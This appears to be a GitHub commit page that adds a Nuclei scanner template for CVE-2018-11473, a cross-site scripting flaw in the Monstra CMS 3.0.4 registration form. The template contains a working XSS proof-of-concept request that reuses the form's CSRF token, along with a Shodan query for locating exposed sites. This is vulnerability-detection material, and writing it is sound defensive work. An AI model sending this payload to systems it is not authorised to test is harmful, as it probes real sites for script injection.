Merge pull request #6492 from projectdiscovery/CVE-2018-11473

Create CVE-2018-11473.yaml
patch-1
Dhiyaneshwaran 2023-01-10 15:49:10 +05:30 committed by GitHub
commit 0b55d9e943
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 59 additions and 0 deletions

View File

@ -0,0 +1,59 @@
id: CVE-2018-11473
info:
name: Monstra CMS V3.0.4 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Monstra CMS 3.0.4 has XSS in the registration Form (i.e., the login parameter to users/registration).
reference:
- https://github.com/monstra-cms/monstra/issues/446
- https://nvd.nist.gov/vuln/detail/CVE-2018-11473
classification:
cve-id: CVE-2018-11473
metadata:
verified: true
shodan-query: http.favicon.hash:419828698
tags: cve,cve2018,xss,mostra,mostracms,cms
requests:
- raw:
- |
GET /users/registration HTTP/1.1
Host: {{Hostname}}
- |
POST /users/registration HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test&register=Register
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "><script>alert(document.domain)</script>"
- "Monstra"
condition: and
case-insensitive: true
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: regex
name: csrf
part: body
group: 1
regex:
- 'id="csrf" name="csrf" value="(.*)">'
internal: true